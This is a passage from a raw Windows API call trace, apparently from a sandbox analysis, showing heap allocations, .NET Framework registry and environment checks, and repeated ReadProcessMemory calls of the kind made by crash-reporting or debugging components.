hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7360 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7420 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7450 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7540 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.926] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.926] OutOfProcessExceptionEventSignatureCallback () returned 0x0 [0078.926] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x7ffc37f90000 [0078.926] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetProcessIdOfThread") returned 0x7ffc37faf030 [0078.926] GetProcAddress (hModule=0x7ffc37f90000, lpProcName="GetThreadId") returned 0x7ffc37fae7c0 [0078.926] GetProcessIdOfThread (Thread=0x38c) returned 0x69c [0078.926] GetThreadId (Thread=0x38c) returned 0x8cc [0078.926] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bced0 [0078.926] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x18) returned 0x22b349bbbd0 [0078.926] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x160) returned 0x22b349a17a0 [0078.926] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd320 [0078.926] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x80) returned 0x22b349a27b0 [0078.927] GetEnvironmentVariableA (in: lpName="MSCORDACWKS_DEBUG", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.927] GetEnvironmentVariableW (in: lpName="COMPlus_DbgDACSkipVerifyDlls", lpBuffer=0x0, nSize=0x0 | out: lpBuffer=0x0) returned 0x0 [0078.927] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a50 | out: phkResult=0x4c1ec77a50*=0x0) returned 0x2 [0078.927] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\.NETFramework", ulOptions=0x0, samDesired=0x20019, phkResult=0x4c1ec77a58 | out: phkResult=0x4c1ec77a58*=0x1fc) returned 0x0 [0078.927] RegQueryValueExW (in: hKey=0x1fc, lpValueName="DbgDACSkipVerifyDlls", lpReserved=0x0, lpType=0x4c1ec77ab8, lpData=0x4c1ec77a48, lpcbData=0x4c1ec77a40*=0x4 | out: lpType=0x4c1ec77ab8*=0x0, lpData=0x4c1ec77a48*=0x0, lpcbData=0x4c1ec77a40*=0x4) returned 0x2 [0078.927] RegCloseKey (hKey=0x1fc) returned 0x0 [0078.927] VirtualAlloc (lpAddress=0x0, dwSize=0x40000, flAllocationType=0x1000, flProtect=0x4) returned 0x22b34ad0000 [0078.927] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570000, lpBuffer=0x22b34ad0030, nSize=0x40, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0030*, lpNumberOfBytesRead=0x4c1ec77c50*=0x40) returned 1 [0078.927] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd410 [0078.927] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16570130, lpBuffer=0x22b34ad0090, nSize=0x108, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad0090*, lpNumberOfBytesRead=0x4c1ec77c50*=0x108) returned 1 [0078.927] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd080 [0078.927] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc165701e8, lpBuffer=0x22b34ad01c0, nSize=0x8, lpNumberOfBytesRead=0x4c1ec77c50 | out: lpBuffer=0x22b34ad01c0*, lpNumberOfBytesRead=0x4c1ec77c50*=0x8) returned 1 [0078.927] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd440 [0078.927] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16c76b2c, lpBuffer=0x22b34ad01f0, nSize=0x1c, lpNumberOfBytesRead=0x4c1ec77c80 | out: lpBuffer=0x22b34ad01f0*, lpNumberOfBytesRead=0x4c1ec77c80*=0x1c) returned 1 [0078.927] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bce10 [0078.928] GetLastError () returned 0xcb [0078.928] SetLastError (dwErrCode=0xcb) [0078.928] GetLastError () returned 0xcb [0078.928] SetLastError (dwErrCode=0xcb) [0078.928] GetLastError () returned 0xcb [0078.928] SetLastError (dwErrCode=0xcb) [0078.928] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc16ea93a8, lpBuffer=0x22b34ad0230, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0230*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.928] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd0b0 [0078.928] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934000, lpBuffer=0x22b34ad0260, nSize=0x98, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0260*, lpNumberOfBytesRead=0x4c1ec781a0*=0x98) returned 1 [0078.928] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcff0 [0078.928] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x934040, lpBuffer=0x22b34ad0320, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0320*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.928] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf60 [0078.928] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e400, lpBuffer=0x22b34ad0350, nSize=0x8, lpNumberOfBytesRead=0x4c1ec781a0 | out: lpBuffer=0x22b34ad0350*, lpNumberOfBytesRead=0x4c1ec781a0*=0x8) returned 1 [0078.928] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bcf00 [0078.928] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x4c1ec78288, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x4c1ec78288*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.928] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95e2b0, lpBuffer=0x22b34ad0380, nSize=0x7c8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0380*, lpNumberOfBytesRead=0x4c1ec78190*=0x7c8) returned 1 [0078.928] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd020 [0078.928] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x400) returned 0x22b349be490 [0078.929] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a27b0 | out: hHeap=0x22b349a0000) returned 1 [0078.929] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x95be30, lpBuffer=0x22b34ad0b70, nSize=0x198, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0b70*, lpNumberOfBytesRead=0x4c1ec78160*=0x198) returned 1 [0078.929] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349bd050 [0078.929] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x861390, lpBuffer=0x22b34ad0d30, nSize=0x8, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d30*, lpNumberOfBytesRead=0x4c1ec78190*=0x8) returned 1 [0078.929] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7510 [0078.929] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25b7668, lpBuffer=0x22b34ad0d60, nSize=0x94, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0d60*, lpNumberOfBytesRead=0x4c1ec78190*=0x94) returned 1 [0078.929] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7330 [0078.929] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2a0, lpBuffer=0x22b34ad0e20, nSize=0x14, lpNumberOfBytesRead=0x4c1ec78190 | out: lpBuffer=0x22b34ad0e20*, lpNumberOfBytesRead=0x4c1ec78190*=0x14) returned 1 [0078.929] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7540 [0078.929] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x7ffc12e8c978, lpBuffer=0x22b34ad0e60, nSize=0x40, lpNumberOfBytesRead=0x4c1ec78160 | out: lpBuffer=0x22b34ad0e60*, lpNumberOfBytesRead=0x4c1ec78160*=0x40) returned 1 [0078.929] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x0, Size=0x20) returned 0x22b349c7360 [0078.929] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bc2b0, lpBuffer=0x4c1ec783c0, nSize=0xd50, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec783c0*, lpNumberOfBytesRead=0x4c1ec78230*=0xd50) returned 1 [0078.929] ReadProcessMemory (in: hProcess=0x390, lpBaseAddress=0x25bd000, lpBuffer=0x4c1ec79110, nSize=0x8a0, lpNumberOfBytesRead=0x4c1ec78230 | out: lpBuffer=0x4c1ec79110*, lpNumberOfBytesRead=0x4c1ec78230*=0x8a0) returned 1 [0078.929] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bbbd0 | out: hHeap=0x22b349a0000) returned 1 [0078.929] VirtualFree (lpAddress=0x22b34ad0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcff0 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf00 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd410 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bcf60 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd020 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd050 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd080 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd440 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd0b0 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bce10 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7510 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7330 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7540 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349c7360 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349be490 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bd320 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349a17a0 | out: hHeap=0x22b349a0000) returned 1 [0078.930] HeapFree (in: hHeap=0x22b349a0000, dwFlags=0x0, lpMem=0x22b349bced0 | out: hHeap=0x22b349a0000) returned 1 [0080.921] OutOfProcessFunctionTableCallback () returned 0x0 [0080.921] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63c0, lpBuffer=0x4c1ec76978, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76978*, lpNumberOfBytesRead=0x0) returned 1 [0080.921] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63c0, lpBuffer=0x4c1ec76890, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76890*, lpNumberOfBytesRead=0x0) returned 1 [0080.921] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9a63a0, lpBuffer=0x4c1ec76880, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76880*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x9587b0, lpBuffer=0x4c1ec76868, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76868*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70020, lpBuffer=0x4c1ec768a0, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec768a0*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0050, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb004c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70a08, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0044, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.922] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70878, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1800, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb003c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0038, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0034, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f704a8, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.923] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70478, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1120, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb002c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0028, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0024, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70070, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0020, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.924] GetProcessHeap () returned 0x22b349a0000 [0080.924] RtlAllocateHeap (HeapHandle=0x22b349a0000, Flags=0x8, Size=0x48) returned 0x22b34a41440 [0080.924] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0050, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.925] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb004c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.925] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.927] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70a08, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.927] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.927] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ad4, lpBuffer=0x22b34a41440, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41440*, lpNumberOfBytesRead=0x0) returned 1 [0080.927] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1ae0, lpBuffer=0x22b34a4144c, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a4144c*, lpNumberOfBytesRead=0x0) returned 1 [0080.927] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0048, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.927] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0044, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.927] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70878, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1800, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1804, lpBuffer=0x22b34a41458, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41458*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0040, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb003c, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0038, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0034, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f704a8, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a0, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.928] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11a4, lpBuffer=0x22b34a41464, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41464*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb11b0, lpBuffer=0x22b34a41470, nSize=0xc, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x22b34a41470*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb0030, lpBuffer=0x4c1ec76840, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76840*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6f70478, lpBuffer=0x4c1ec76860, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76860*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1120, lpBuffer=0x4c1ec76858, nSize=0x4, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x4c1ec76858*, lpNumberOfBytesRead=0x0) returned 1 [0080.929] ReadProcessMemory (in: hProcess=0x260, lpBaseAddress=0x7ffbb6fb1124, lpBuffer=0x22b34a4147c, nSize=0xc, 